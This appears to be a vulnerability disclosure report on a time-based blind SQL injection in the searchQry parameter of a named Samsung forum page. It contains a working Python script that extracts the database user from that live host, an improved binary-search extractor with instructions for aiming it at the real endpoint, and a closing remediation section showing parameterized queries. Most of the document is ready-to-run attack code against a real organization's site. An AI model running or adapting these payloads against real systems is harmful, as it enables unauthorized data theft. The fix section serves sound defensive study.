A MySQL blind injection note (with Python verification script) from a Samsung Group website
A time-based MySQL blind injection on a Samsung Group site. Character extraction is fast, and a Python verification script is attached.
The injection point:
http://www.sgsg.samsung.com/forum/qna.do?pageNo=1&searchQry=123
The searchQry parameter is injectable.
Extracting the database user gives:
sgsguser@localhost
Verification script:
# Ported from the original Python 2 script (httplib, urllib.quote, print statement)
# to Python 3; the extraction logic is unchanged. Unused variables were dropped.
import http.client
import string
import sys
import time
import urllib.parse

headers = {
    'Cookie': '',
    'User-Agent': 'Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',
}

# Characters tried at each position: a-z, 0-9 and the separators found in user@host.
payloads = list(string.ascii_lowercase)
for i in range(0, 10):
    payloads.append(str(i))
payloads += ['@', '_', '.']

print('start to retrieve MySQL user:')
user = ''
for i in range(1, 30, 1):
    for payload in payloads:
        try:
            conn = http.client.HTTPConnection('www.sgsg.samsung.com', timeout=5)
            # Time-based oracle: when the i-th character of user() equals this payload,
            # sleep(1) runs for every row the query touches and the request overruns
            # the 5-second timeout; the resulting exception is treated as a hit.
            s = "123'XOR(if(ascii(mid(user()from(%s)for(1)))=%s,sleep(1),0))OR'bbb" % (i, ord(payload))
            conn.request(method='GET',
                         url='/forum/qna.do?pageNo=1&searchQry=' + urllib.parse.quote(s),
                         headers=headers)
            conn.getresponse().read()
            conn.close()
            print('.', end='')
            sys.stdout.flush()
        except Exception:
            user += payload
            print('\n[in progress]', user)
            break
print('\nMySQL user is', user)
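The script above scans a 39-character alphabet linearly, so each position can cost up to 39 requests. As an added example that is not part of the original report, the following Python 3 code recovers the same user() value with a binary search over the ASCII code (7 requests per character) and decides on measured elapsed time rather than on a thrown timeout. The payload keeps the report's '...XOR(if(...))OR'bbb framing; the host and path, the 1-second delay, and the simulated secret "sgsguser@localhost" used for the offline run are assumptions.

```python
import http.client
import time
import urllib.parse

# Secret used only by the offline simulation (constructed for this example).
SIMULATED_USER = "sgsguser@localhost"

# Same payload shape as the report's script, but ">" instead of "=" so that
# each character can be located by binary search instead of a linear scan.
PAYLOAD_TEMPLATE = ("123'XOR(if(ascii(mid(user()from({pos})for(1)))>{threshold},"
                    "sleep({delay}),0))OR'bbb")


def build_payload(pos, threshold, delay=1):
    """Raw (unencoded) searchQry value asking: ascii(char at pos) > threshold?"""
    return PAYLOAD_TEMPLATE.format(pos=pos, threshold=threshold, delay=delay)


def http_timing_oracle(host, path, delay=1, timeout=10):
    """Oracle that questions a live endpoint and decides by elapsed time.

    Assumed transport for a real run; the offline demo below does not call it.
    """
    def once(pos, threshold):
        url = path + urllib.parse.quote(build_payload(pos, threshold, delay))
        conn = http.client.HTTPConnection(host, timeout=timeout)
        start = time.time()
        try:
            conn.request("GET", url)
            conn.getresponse().read()
        except OSError:  # socket.timeout is an OSError: sleep() ran past the timeout
            return True
        finally:
            conn.close()
        return time.time() - start >= delay

    def ask(pos, threshold):
        # Network jitter can cross the threshold by chance; confirm positives once.
        return once(pos, threshold) and once(pos, threshold)

    return ask


def simulated_oracle(secret):
    """Offline stand-in answering the same question from a known string.

    MySQL's mid() past the end returns '' and ascii('') is 0, so positions
    beyond the secret answer as code 0; the extractor uses that as terminator.
    """
    def ask(pos, threshold):
        code = ord(secret[pos - 1]) if pos <= len(secret) else 0
        return code > threshold
    return ask


def extract_char(ask, pos):
    """Binary search the ASCII code (0..127) of one character: 7 questions."""
    lo, hi = 0, 127  # invariant: lo <= code <= hi
    while lo < hi:
        mid = (lo + hi) // 2
        if ask(pos, mid):  # code > mid
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_string(ask, max_len=64):
    """Recover the whole value, stopping at the first position that reads as 0."""
    out = []
    for pos in range(1, max_len + 1):
        code = extract_char(ask, pos)
        if code == 0:
            break
        out.append(chr(code))
    return "".join(out)


if __name__ == "__main__":
    # Offline run; replace the oracle with
    # http_timing_oracle("www.sgsg.samsung.com", "/forum/qna.do?pageNo=1&searchQry=")
    # to question the real endpoint.
    print(extract_string(simulated_oracle(SIMULATED_USER)))
```

The simulated oracle stands in for the live target so the example runs offline. Against a real endpoint the elapsed-time check is the weak point: a single slow response looks like a hit, which is why the HTTP oracle repeats every positive answer once before accepting it.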
Solution:
Filter and validate the searchQry parameter, and build the query with bound parameters instead of splicing the value into the SQL string.
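What that fix looks like in practice, as an added example that is not the site's code: a Python 3 search handler in the assumed shape of the flawed one (the value spliced into a LIKE clause) beside the parameterized form, run against a constructed in-memory SQLite table. SQLite has no sleep() or XOR, so the injected value keeps the report's '...OR'bbb framing with a plain OR 1=1 in the middle; the table name, column and rows are constructed for the example.

```python
import sqlite3

# Constructed sample rows standing in for the forum's Q&A table.
SAMPLE_ROWS = [
    ("How do I reset my password?",),
    ("Order 123 has not arrived",),
    ("Warranty question",),
]

# Same quote-closing shape as the report's payload; the MySQL-specific
# XOR(if(...sleep...)) part is replaced with OR 1=1 for the SQLite stand-in.
INJECTED_QUERY = "zzz'OR 1=1 OR'bbb"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE qna (title TEXT)")
    conn.executemany("INSERT INTO qna VALUES (?)", SAMPLE_ROWS)
    return conn


def search_vulnerable(conn, search_qry):
    """Assumed shape of the flawed handler: the parameter becomes part of the SQL text."""
    sql = "SELECT title FROM qna WHERE title LIKE '%" + search_qry + "%'"
    return [row[0] for row in conn.execute(sql)]


def search_parameterized(conn, search_qry):
    """Fix: the value is bound as a parameter and can never close the quote."""
    sql = "SELECT title FROM qna WHERE title LIKE ?"
    return [row[0] for row in conn.execute(sql, ("%" + search_qry + "%",))]


def allowlist_ok(search_qry, max_len=64):
    """Input filter as defence in depth: only what a forum search needs.

    This is the secondary control; binding parameters is the primary one.
    """
    return (len(search_qry) <= max_len
            and all(c.isalnum() or c in " _-." for c in search_qry))


if __name__ == "__main__":
    db = make_db()
    print(search_vulnerable(db, "123"))               # a normal search works either way
    print(search_vulnerable(db, INJECTED_QUERY))      # every row comes back
    print(search_parameterized(db, INJECTED_QUERY))   # nothing matches the literal
    print(allowlist_ok(INJECTED_QUERY))               # rejected before reaching SQL
```

With the spliced query, the injected value turns the WHERE clause into `title LIKE '%zzz' OR 1=1 OR 'bbb%'` and the whole table is returned; with a bound parameter the same bytes are just a literal that matches nothing. Filtering alone is brittle (the report's payload needs only a single quote, which a search box may legitimately receive), so it belongs in front of parameterized queries, not in place of them.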